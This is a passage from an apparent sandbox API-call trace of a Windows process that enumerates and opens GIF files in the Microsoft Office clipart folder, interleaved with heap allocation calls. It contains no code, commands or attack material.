dwReserved1=0x77892bc0, cFileName="AG00171_.GIF", cAlternateFileName="")) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.929] AreFileApisANSI () returned 1 [0100.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.930] AreFileApisANSI () returned 1 [0100.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 69 [0100.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.930] GetFileType (hFile=0x27c) returned 0x1 [0100.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.930] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.930] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.930] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.931] CloseHandle (hObject=0x27c) returned 1 [0100.931] AreFileApisANSI () returned 1 [0100.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 69 [0100.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.931] GetFileType (hFile=0x27c) returned 0x1 [0100.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.931] CloseHandle (hObject=0x27c) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.932] AreFileApisANSI () returned 1 [0100.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 69 [0100.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1398)) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.933] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1126, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00172_.GIF", cAlternateFileName="")) returned 1 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0100.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0100.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.934] AreFileApisANSI () returned 1 [0100.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.934] AreFileApisANSI () returned 1 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 69 [0100.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.934] GetFileType (hFile=0x27c) returned 0x1 [0100.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0100.935] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.935] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.935] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.935] CloseHandle (hObject=0x27c) returned 1 [0100.935] AreFileApisANSI () returned 1 [0100.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 69 [0100.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.935] GetFileType (hFile=0x27c) returned 0x1 [0100.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.936] CloseHandle (hObject=0x27c) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.937] 